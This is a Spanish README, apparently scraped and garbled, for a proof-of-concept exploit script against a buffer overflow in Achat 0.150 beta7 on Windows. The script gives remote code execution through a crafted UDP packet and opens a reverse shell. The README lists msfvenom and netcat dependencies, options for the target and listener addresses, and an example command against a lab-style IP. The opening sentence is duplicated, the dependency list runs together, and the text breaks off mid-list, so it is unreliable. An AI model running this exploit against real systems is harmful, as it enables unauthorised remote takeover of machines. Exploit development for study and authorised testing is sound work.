Este es un exploit de prueba de concepto para CVE-2015-1578, una vulnerabilidad de desbordamiento de búfer en Achat 0.150 beta7 en Windows. La explotación conduce a la ejecución remota de código mediante un paquete UDP manipulado.
Este es un exploit de prueba de concepto para CVE-2015-1578, una vulnerabilidad de desbordamiento de búfer en Achat 0.150 beta7 en Windows. La explotación permite la ejecución remota de código mediante un paquete UDP manipulado.
Este PoC pretende servir como un ejemplo limpio, mínimo y bien estructurado de desarrollo de exploits. Demuestra:
msfvenommsfvenom (parte de Metasploit Framework)rlwrap (para una mayor usabilidad de Netcat)msfvenomrlwrap nc-i <target_ip> Dirección IP del objetivo (obligatorio)
-l, --lhost <listener_ip> IP local para el shell inverso (obligatorio)
-p, --lport <port> Puerto local para el shell inverso (obligatorio)
--rport <port> Puerto UDP remoto en el objetivo (por defecto: 9256)
python3 chatter.py -i 10.10.10.74 -l 10.10.16.7 -p 9393
Esto hará lo siguiente: